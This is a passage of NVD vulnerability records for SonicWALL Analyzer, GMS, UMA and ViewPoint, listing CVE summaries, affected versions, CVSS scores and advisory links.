Vulnerabilites related to sonicwall - analyzer
Vulnerability from fkie_nvd
Published
2014-11-25 15:59
Modified
2024-11-21 02:19
Severity ?
Summary
The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://www.securityfocus.com/bid/71241 | Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://www.zerodayinitiative.com/advisories/ZDI-14-385/ | Third Party Advisory, VDB Entry | |
| cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/98911 | VDB Entry | |
| cve@mitre.org | https://support.software.dell.com/product-notification/136814 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/71241 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.zerodayinitiative.com/advisories/ZDI-14-385/ | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/98911 | VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://support.software.dell.com/product-notification/136814 | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | analyzer | 7.2 | |
| sonicwall | global_management_system | 7.2 | |
| sonicwall | uma_em5000 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.2:sp1:*:*:*:*:*:*",
"matchCriteriaId": "45C372C6-BEFE-4839-87F6-ECA3E83554DC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.2:sp1:*:*:*:*:*:*",
"matchCriteriaId": "BCBFA0E1-2897-42BB-87F3-19731E95C5DC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "23315AEF-29C1-4A58-A933-2A4305123D7F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors."
},
{
"lang": "es",
"value": "La aplicaci\u00f3n web ViewPoint en Dell SonicWALL Global Management System (GMS) anterior a 7.2 SP2, SonicWALL Analyzer anterior a 7.2 SP2, y SonicWALL UMA anterior a 7.2 SP2 permite a usuarios remotos autenticados ejecutar c\u00f3digo arbitrario a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2014-8420",
"lastModified": "2024-11-21T02:19:03.163",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-11-25T15:59:04.637",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/71241"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-14-385/"
},
{
"source": "cve@mitre.org",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98911"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://support.software.dell.com/product-notification/136814"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/71241"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-14-385/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98911"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://support.software.dell.com/product-notification/136814"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-11 17:15
Modified
2024-11-21 01:49
Severity ?
Summary
An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | analyzer | 7.0 | |
| sonicwall | global_management_system | 4.1 | |
| sonicwall | global_management_system | 5.0 | |
| sonicwall | global_management_system | 5.1 | |
| sonicwall | global_management_system | 6.0 | |
| sonicwall | global_management_system | 7.0 | |
| sonicwall | universal_management_appliance | 5.1 | |
| sonicwall | universal_management_appliance | 6.0 | |
| sonicwall | universal_management_appliance | 7.0 | |
| sonicwall | viewpoint | 4.1 | |
| sonicwall | viewpoint | 5.0 | |
| sonicwall | viewpoint | 6.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9ABA5C-59AF-496A-B22E-0C88892EC8FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3627733D-E0CD-4E00-8D36-AB4EF784977C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "60563570-4865-4D8B-9E24-A371CABE1BFE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B2EFEF89-357C-4EC2-B6A3-C803E64A2227",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CE35F845-3A01-4974-BD7C-88CBE759830D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CEF95BB8-DF0B-4131-8A89-82DE559CC09B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0AC115CB-0F22-47C8-86F3-9990058896FA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "160BD653-09A8-4939-9A5D-8EED7B5B4D78",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "747153CA-2225-40A3-9C21-E9E62C24892B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "FE97B72B-31B2-4E2D-99EE-81A1C645CDF4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "28C845AC-8B12-4147-A5D7-9D5E4C7953EB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1589B409-1AF8-4789-90C3-6E1DFA14677E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account."
},
{
"lang": "es",
"value": "Se presenta una Vulnerabilidad de Omisi\u00f3n de Autenticaci\u00f3n en DELL SonicWALL Analyzer versi\u00f3n 7.0, Global Management System (GMS) versiones 4.1, 5.0, 5.1, 6.0 y 7.0; Universal Management Appliance (UMA) versiones 5.1, 6.0 y 7.0 y ViewPoint versiones 4.1, 5.0, 5.1 y 6.0 por medio del par\u00e1metro skipSessionCheck en la interfaz UMA (/appliance/), lo que podr\u00eda permitir a un usuario malicioso remoto obtener acceso a la cuenta root."
}
],
"id": "CVE-2013-1359",
"lastModified": "2024-11-21T01:49:25.517",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-11T17:15:11.593",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24204"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24322"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57445"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/author/7547/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2013/Jan/125"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24204"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24322"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57445"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/author/7547/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2013/Jan/125"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-05-20 18:59
Modified
2024-11-21 02:30
Severity ?
Summary
The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | uma_em5000_firmware | * | |
| sonicwall | uma_em5000 | - | |
| sonicwall | analyzer | * | |
| sonicwall | global_management_system | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:uma_em5000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A51CB7D8-08D9-4716-8D39-F33596DCFD18",
"versionEndIncluding": "7.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "23315AEF-29C1-4A58-A933-2A4305123D7F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BB379556-F957-439C-8644-DFD96C9BBE8D",
"versionEndIncluding": "7.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8DADDE6-6E5A-4C12-8B37-C9A173B05481",
"versionEndIncluding": "7.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration."
},
{
"lang": "es",
"value": "La aplicaci\u00f3n web GMS ViewPoint (GMSVP) en Dell Sonicwall GMS, Analyzer, y UMA EM5000 anterior a 7.2 SP4 permite a usuarios remotos autenticados ejecutar comandos arbitrarios a trav\u00e9s de vectores relacionados con la configuraci\u00f3n."
}
],
"id": "CVE-2015-3990",
"lastModified": "2024-11-21T02:30:13.283",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2015-05-20T18:59:05.793",
"references": [
{
"source": "zdi-disclosures@trendmicro.com",
"url": "http://www.securityfocus.com/bid/74756"
},
{
"source": "zdi-disclosures@trendmicro.com",
"url": "http://www.securitytracker.com/id/1032373"
},
{
"source": "zdi-disclosures@trendmicro.com",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-15-231/"
},
{
"source": "zdi-disclosures@trendmicro.com",
"url": "https://support.software.dell.com/product-notification/152178"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/74756"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1032373"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-15-231/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://support.software.dell.com/product-notification/152178"
}
],
"sourceIdentifier": "zdi-disclosures@trendmicro.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-19"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-02-17 15:59
Modified
2024-11-21 02:48
Severity ?
Summary
The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | analyzer | 7.2 | |
| sonicwall | analyzer | 8.0 | |
| sonicwall | analyzer | 8.1 | |
| sonicwall | global_management_system | 7.2 | |
| sonicwall | global_management_system | 8.0 | |
| sonicwall | global_management_system | 8.1 | |
| sonicwall | uma_em5000_firmware | 7.2 | |
| sonicwall | uma_em5000_firmware | 8.0 | |
| sonicwall | uma_em5000_firmware | 8.1 | |
| sonicwall | uma_em5000 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "05DC3043-D6B1-4863-AE06-FAC32F94091B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "59AE4366-0EF5-4DD9-B533-1101AB06FC0E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B30D6D7E-63DA-49F9-A904-FAC2C40B4B72",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C91AE401-839F-4B95-AC84-12D003B0CF59",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E119AFF9-BAB9-42BA-AF89-A0C59DC4D4F4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "36989FC7-3390-455E-8F7E-E3C4EB29D812",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:uma_em5000_firmware:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "94D32881-3205-40C9-9099-D517DDD0E85F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4AC08F8A-B838-4878-A599-8FBD69EAF28E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "34AECE24-76B8-4EEB-9018-F3C35FEE6A00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "23315AEF-29C1-4A58-A933-2A4305123D7F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input."
},
{
"lang": "es",
"value": "La aplicaci\u00f3n web GMS ViewPoint (GMSVP) en Dell SonicWALL GMS, Analyzer y UMA EM5000 7.2, 8.0 y 8.1 en versiones anteriores a Hotfix 168056 permite a usuarios remotos autenticados ejecutar comandos arbitrarios a trav\u00e9s de vectores relacionados con la entrada de configuraci\u00f3n."
}
],
"id": "CVE-2016-2396",
"lastModified": "2024-11-21T02:48:22.993",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.1,
"impactScore": 6.0,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-02-17T15:59:06.737",
"references": [
{
"source": "zdi-disclosures@trendmicro.com",
"url": "http://www.securitytracker.com/id/1035015"
},
{
"source": "zdi-disclosures@trendmicro.com",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-164"
},
{
"source": "zdi-disclosures@trendmicro.com",
"url": "https://support.software.dell.com/product-notification/185943"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1035015"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-164"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://support.software.dell.com/product-notification/185943"
}
],
"sourceIdentifier": "zdi-disclosures@trendmicro.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-12-09 16:36
Modified
2024-11-21 02:00
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | analyzer | 7.0 | |
| sonicwall | analyzer | 7.1 | |
| sonicwall | analyzer | 7.1 | |
| sonicwall | global_management_system | 7.0 | |
| sonicwall | global_management_system | 7.1 | |
| sonicwall | global_management_system | 7.1 | |
| sonicwall | uma_e5000_firmware | 7.0 | |
| sonicwall | uma_e5000_firmware | 7.1 | |
| sonicwall | uma_e5000_firmware | 7.1 | |
| sonicwall | uma_e5000 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9ABA5C-59AF-496A-B22E-0C88892EC8FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "8078DCDB-FC88-41C8-BE14-688B5F4911E1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "19E54EA9-F9F8-47FA-9F31-C05C2AE59539",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CEF95BB8-DF0B-4131-8A89-82DE559CC09B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "AF555F86-D3E0-4763-9E9A-C26D5C986FC4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "418595FE-EBFA-4B1D-A479-171BBD56279A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:uma_e5000_firmware:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "907AFD7C-F904-47AC-937E-4CCDB5E4CEFF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:sonicwall:uma_e5000_firmware:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "93D89B14-232D-4112-94B7-7757A3BBDD42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:sonicwall:uma_e5000_firmware:7.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "66B20FAD-1131-4C68-BA4D-8B1A20C1DF91",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:uma_e5000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D8F6C2F1-8C1A-4BAD-8F49-464258B09354",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades XSS en ematStaticAlertTypes.jsp en la secci\u00f3n de ajustes de alertas en Dell SonicWALL Global Management System (GMS), Analyzer, y UMA EM5000 7.1 SP1 anterior al Hotfix 134235 permite a usuarios autenticados remotamente inyectar secuencias de comandos web o HTML arbitrarias a trav\u00e9s de los par\u00e1metros (1) valfield_1 o (2) value_1 a createNewThreshold.jsp."
}
],
"evaluatorComment": "Per: http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf\n\n\"Affected Products\nDell SonicWALL GMS\nDell SonicWALL Analyzer\nDell SonicWALL UMA E5000\n\nAffected Software Versions\nVersion\n7.x\"",
"id": "CVE-2013-7025",
"lastModified": "2024-11-21T02:00:11.820",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2013-12-09T16:36:50.723",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0022.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://osvdb.org/100610"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2013/Dec/32"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/55923"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/30054"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
